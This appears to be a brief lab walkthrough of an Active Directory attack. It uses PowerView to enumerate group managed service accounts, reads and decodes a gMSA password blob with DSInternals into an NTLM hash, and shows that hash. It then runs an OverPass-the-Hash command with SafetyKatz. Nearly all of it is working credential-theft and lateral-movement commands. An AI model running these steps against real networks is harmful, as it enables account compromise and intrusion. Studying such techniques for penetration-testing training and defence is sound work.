Untitled

Enumerating gMSA using PowerView

First Loading PowerView

. .\PowerView.ps1

Untitled

Now Let’s Enumerate the gMSA

Get-DomainObject -LDAPFilter '(objectClass=msDS-GroupManagedServiceAccount)'

Untitled

Now let’s see who have permissions to read the password blob

Get-ADServiceAccount -Identity jumpone -Properties * | select PrincipalsAllowedToRetrieveManagedPassword

Untitled

Now let’s read the password

$Passwordblob = (Get-ADServiceAccount -Identity jumpone -Properties msDS-ManagedPassword).'msDS-ManagedPassword'
Import-Module C:\AD\Tools\DSInternals_v4.7\DSInternals\DSInternals.psd1
$decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob
ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPassword

Untitled

And we got the hash

Username: jumpone
ntlmhash: 367032486cc36f7ba0561d7e3e90f615

Now let’s OverPass-The-Hash

.\SafetyKatz.exe "sekurlsa::pth /user:jumpone /ntlm:367032486cc36f7ba0561d7e3e90f615 /domain:us.techcorp.local /ptt"